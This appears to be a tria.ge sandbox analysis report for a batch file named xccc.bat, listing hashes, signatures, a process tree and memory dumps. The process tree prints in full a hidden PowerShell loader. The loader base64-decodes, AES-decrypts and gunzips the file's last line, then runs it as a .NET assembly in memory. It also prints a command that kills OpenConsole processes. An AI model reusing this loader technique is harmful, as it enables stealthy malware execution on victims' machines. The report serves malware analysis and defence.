Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

5

Static

static

1

xccc.bat

windows7-x64

1

xccc.bat

windows10-2004-x64

5

xccc.bat

android-10-x64

xccc.bat

android-11-x64

Analysis

  • max time kernel
    48s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    06/04/2024, 13:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    xccc.bat

  • Size

    1.6MB

  • MD5

    a1e6c524a6982d7148de18b82ccf4b4c

  • SHA1

    bfb6449c135de59fb53d65a11b7a1512e4d6ce97

  • SHA256

    c00cc28d3c1b0187d1971c7e399acd5d9acae5c8042cd8d08c5b492697e0d83d

  • SHA512

    a14cb2f7465cd82dab90d9445da7a362b11ff67100db57da886cfd84cce2ba926a889cb4360203ca94cd73728f93abe367421415bb788e090281e3822413a7d8

  • SSDEEP

    24576:BFjjUxX2aos0an5wdEc5R3eGmasM6MK4NWytx5qwmbw61OFW:BGxXjoY5wiqRuGmtw61X

Score
1/10

Malware Config

Signatures

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\xccc.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2120
    • C:\Windows\system32\cmd.exe
      cmd.exe /c powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$GwWqW = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\xccc.bat').Split([Environment]::NewLine);$evTXW = $GwWqW[$GwWqW.Length - 1];$PnSMV = [System.Convert]::FromBase64String($evTXW);$QFQaj = New-Object System.Security.Cryptography.AesManaged;$QFQaj.Mode = [System.Security.Cryptography.CipherMode]::CBC;$QFQaj.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$QFQaj.Key = [System.Convert]::FromBase64String('mQ0sWHznYiuFpX5Tdo9CKYViPqytywMU741Clm4fH+I=');$QFQaj.IV = [System.Convert]::FromBase64String('2JkSgvqzf8gbm9ZwkvRa+w==');$dPqVC = $QFQaj.CreateDecryptor();$PnSMV = $dPqVC.TransformFinalBlock($PnSMV, 0, $PnSMV.Length);$dPqVC.Dispose();$QFQaj.Dispose();$iWYjd = New-Object System.IO.MemoryStream(, $PnSMV);$pPFiF = New-Object System.IO.MemoryStream;$CbaTY = New-Object System.IO.Compression.GZipStream($iWYjd, [IO.Compression.CompressionMode]::Decompress);$CbaTY.CopyTo($pPFiF);$CbaTY.Dispose();$iWYjd.Dispose();$pPFiF.Dispose();$PnSMV = $pPFiF.ToArray();[System.Reflection.Assembly]::Load($PnSMV).EntryPoint.Invoke($null, (, [string[]] ('')))"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:904
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$GwWqW = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\xccc.bat').Split([Environment]::NewLine);$evTXW = $GwWqW[$GwWqW.Length - 1];$PnSMV = [System.Convert]::FromBase64String($evTXW);$QFQaj = New-Object System.Security.Cryptography.AesManaged;$QFQaj.Mode = [System.Security.Cryptography.CipherMode]::CBC;$QFQaj.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$QFQaj.Key = [System.Convert]::FromBase64String('mQ0sWHznYiuFpX5Tdo9CKYViPqytywMU741Clm4fH+I=');$QFQaj.IV = [System.Convert]::FromBase64String('2JkSgvqzf8gbm9ZwkvRa+w==');$dPqVC = $QFQaj.CreateDecryptor();$PnSMV = $dPqVC.TransformFinalBlock($PnSMV, 0, $PnSMV.Length);$dPqVC.Dispose();$QFQaj.Dispose();$iWYjd = New-Object System.IO.MemoryStream(, $PnSMV);$pPFiF = New-Object System.IO.MemoryStream;$CbaTY = New-Object System.IO.Compression.GZipStream($iWYjd, [IO.Compression.CompressionMode]::Decompress);$CbaTY.CopyTo($pPFiF);$CbaTY.Dispose();$iWYjd.Dispose();$pPFiF.Dispose();$PnSMV = $pPFiF.ToArray();[System.Reflection.Assembly]::Load($PnSMV).EntryPoint.Invoke($null, (, [string[]] ('')))"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1712
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -Command "Get-Process OpenConsole | Stop-Process -Force"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2612

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    ad7de0d7a2ec30e00ec0a9fa3f15e977

    SHA1

    27aea52f1a027f2c60103f9d52c09c95a5245d46

    SHA256

    af54eae0430cd3775044e553ddfa95710073abac04606d3694cfdbaf5b921a85

    SHA512

    060e161e84af501aea3d057736ca0ccd901e0c1562faaeb1e292461238c3edf1fde38191396e04a64cab06e00314202d28321abaa6774564bb85a59320a27641

    Download Submit

  • memory/1712-12-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1712-6-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1712-8-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1712-7-0x0000000002AB0000-0x0000000002B30000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1712-10-0x0000000002AB0000-0x0000000002B30000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1712-9-0x0000000002AB0000-0x0000000002B30000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1712-11-0x0000000002AB0000-0x0000000002B30000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1712-4-0x000000001B460000-0x000000001B742000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/1712-5-0x0000000002A60000-0x0000000002A68000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2612-18-0x000000001B550000-0x000000001B832000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2612-19-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2612-21-0x0000000002250000-0x0000000002258000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2612-20-0x0000000002960000-0x00000000029E0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2612-22-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2612-23-0x0000000002960000-0x00000000029E0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2612-24-0x0000000002960000-0x00000000029E0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2612-25-0x0000000002960000-0x00000000029E0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2612-26-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

    Filesize

    9.6MB

    Download